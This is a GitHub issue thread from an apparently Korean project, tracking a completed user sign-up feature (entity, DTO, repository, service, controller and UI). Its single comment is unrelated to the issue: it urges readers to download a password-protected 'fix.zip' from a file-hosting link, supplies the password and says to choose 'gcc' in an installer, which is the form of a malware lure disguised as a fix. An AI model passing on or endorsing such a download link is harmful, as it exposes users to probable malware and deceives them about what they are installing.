### ISSUE TITLE
[Feat] 회원가입 기능 구현

### ISSUE THREAD

**Issue by grapefruit224** [Ormi-AHi/TimeCapsule#3]
## 어떤 기능인가요?
> 회원가입 기능

## 작업 상세 내용
- [x] 유저 엔티티, 디티오 구현
- [x] 회원가입 관련 레포지토리, 서비스, 컨트롤러 구현
- [x] 회원가입 UI 구현

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
